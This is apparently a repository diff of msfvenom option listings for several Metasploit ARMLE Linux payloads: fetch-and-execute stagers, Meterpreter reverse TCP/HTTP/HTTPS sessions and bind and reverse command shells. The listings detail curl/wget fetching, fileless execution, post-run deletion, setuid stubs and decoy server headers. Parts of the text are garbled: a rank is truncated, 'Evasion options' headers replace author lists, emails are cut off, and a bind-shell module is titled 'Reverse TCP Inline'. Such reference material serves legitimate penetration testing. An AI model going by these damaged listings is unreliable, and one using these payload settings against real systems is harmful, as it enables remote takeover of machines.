MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt
+102
View File
@@ -0,0 +1,102 @@
Name: HTTP Fetch, Reverse TCP Stager
Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Nor
Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp:
=========================
nemo <nemo@felinemenace.org>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt
+104
View File
@@ -0,0 +1,104 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http:
=========================
cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt
+106
View File
@@ -0,0 +1,106 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 111
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_tcp.txt
+97
View File
@@ -0,0 +1,97 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armle/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME eOJorghpY no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-shell-bind_tcp.txt
+85
View File
@@ -0,0 +1,85 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager
Module: payload/cmd/linux/http/armle/shell/bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
nemo <nemo@felinemenace.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME DNCjskbcX no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
dup2 socket in r12, then execve.
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-shell-reverse_tcp.txt
+93
View File
@@ -0,0 +1,93 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/armle/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
nemo <nemo@felinemenace.org>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME GqKkLiLQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
dup2 socket in r12, then execve.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/cmd-linux-http-armle-shell_bind_tcp.txt
+76
View File
@@ -0,0 +1,76 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/armle/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
civ
hal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ARGV0 sh no argv[0] to pass to execve
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME spYHQrQwU no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Connect to target and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
